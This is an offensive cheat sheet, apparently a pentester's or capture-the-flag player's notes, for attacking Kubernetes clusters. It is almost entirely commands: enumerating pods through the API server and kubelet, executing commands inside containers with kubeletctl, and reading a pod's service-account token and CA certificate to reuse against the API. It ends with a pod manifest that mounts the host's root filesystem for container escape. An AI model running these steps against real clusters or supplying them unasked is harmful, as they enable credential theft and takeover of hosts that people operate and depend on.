## ------------------| Basic Infomations
kubectl --server <IP> get pod
kubectl --server <IP> cluster-info
kubectl --server <IP> get namespaces
kubectl --server <IP> auth can-i --list
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
## ------------------| list all the pods on the node
kubeletctl pods -s <IP>
## ------------------| list all the running pods
kubeletctl runningpods -s <IP>
kubeletctl runningpods -s <IP> | jq -c '.items[].metadata | [.name, .namespace]'
## Check what's not in the kube-system namespace
## ------------------| Execute commands
kubeletctl -s <IP> exec "id" -p <PodName> -c <ContainerName>
## ------------------| Auth to Kubernetes API
# /run/secrets/kubernetes.io/serviceaccount
# /var/run/secrets/kubernetes.io/serviceaccount
# /secrets/kubernetes.io/serviceaccout
kubeletctl -s <IP> exec "ls /run/secrets/kubernetes.io/serviceaccount" -p <PodName> -c <ContainerName>
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <PodName> -c <ContainerName> | tee ca.crt
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p <PodName> -c <ContainerName> | tee token
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
## ------------------| YAML skeleton
apiVersion: v1
kind: Pod
metadata:
name: h4rithd
namespace: default
spec:
containers:
- name: h4rithd
image: nginx:1.14.2 # Use this to get the version: kubectl get pod nginx -o yaml --server <IP>
volumeMounts:
- mountPath: /mnt
name: hostfs
volumes:
- name: hostfs
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: true
## ------------------| Start the pod
kubectl apply -f skeleton.yaml --server <IP>
kubeletctl exec "ls /mnt/" -s <IP> -p h4rithd -c h4rithd